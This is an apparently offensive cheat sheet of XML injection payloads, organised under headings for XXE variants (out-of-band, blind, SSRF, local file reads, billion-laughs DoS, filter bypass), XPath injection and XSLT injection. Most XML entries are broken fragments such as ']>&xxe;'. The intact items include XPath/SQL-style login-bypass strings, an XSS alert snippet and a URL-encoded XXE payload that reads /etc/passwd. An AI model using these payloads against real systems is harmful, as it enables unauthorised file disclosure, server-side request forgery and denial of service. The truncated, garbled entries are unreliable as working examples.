# XML Injection Payloads
## Basic XML External Entity (XXE) Payloads
]>&xxe;
]>&xxe;
]>&xxe;
## XXE with Parameter Entities
">%eval;%exfil;]>
%xxe;]>
## XXE via SVG Upload
## XXE via SOAP
]>&xxe;
## XXE Out-of-Band (OOB)
%xxe;]>
%dtd;]>
## Blind XXE with Error-Based
">%eval;%error;]>
## XXE with UTF-7
+ADw-?xml version="1.0"?+AD4-]>&xxe;
## XML Billion Laughs Attack (DoS)
]>&lol9;
## XXE with Base64 Encoding
]>&xxe;
## XXE via XInclude
## XXE with Expect (PHP)
]>&xxe;
]>&xxe;
## XXE with Data Protocol
]>&xxe;
## XXE via DOCTYPE
]>&xxe;
]>&xxe;
## XXE Local File Inclusion (LFI)
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
## XXE for Windows
]>&xxe;
]>&xxe;
]>&xxe;
## XXE SSRF
]>&xxe;
]>&xxe;
]>&xxe;
## XML Injection via CDATA
alert('XSS')]]>
]]>
## XPath Injection
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
admin' or '1'='1
'or 1=1--
' or 1=1#
admin'--
') or ('1'='1
## SOAP XML Injection
admin' or '1'='1anything
## XML Bomb Variants
]>&e;
## Encoded XXE Payloads
%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
## XXE via RSS Feed
]>&xxe;
## XXE via XML Sitemap
]>&xxe;
## XXE with Public and System Identifiers
## XXE Exfiltration via FTP
%dtd;]>
## XXE with UTF-16
]>&xxe;
## Java-specific XXE
]>&xxe;
]>&xxe;
## XXE via XForms
]>&xxe;
## Nested Entity Attacks
">]>&outer;&inner;
## XXE Filter Bypass
]>&xxe;
]>&xxe;
]>&xxe;
## XML Attribute Injection
admin'--
## XSLT Injection
## SVG XXE Advanced
]>
## Office Document XXE (DOCX, XLSX, etc)
]>&xxe;
## XXE via PDF Upload
]>&xxe;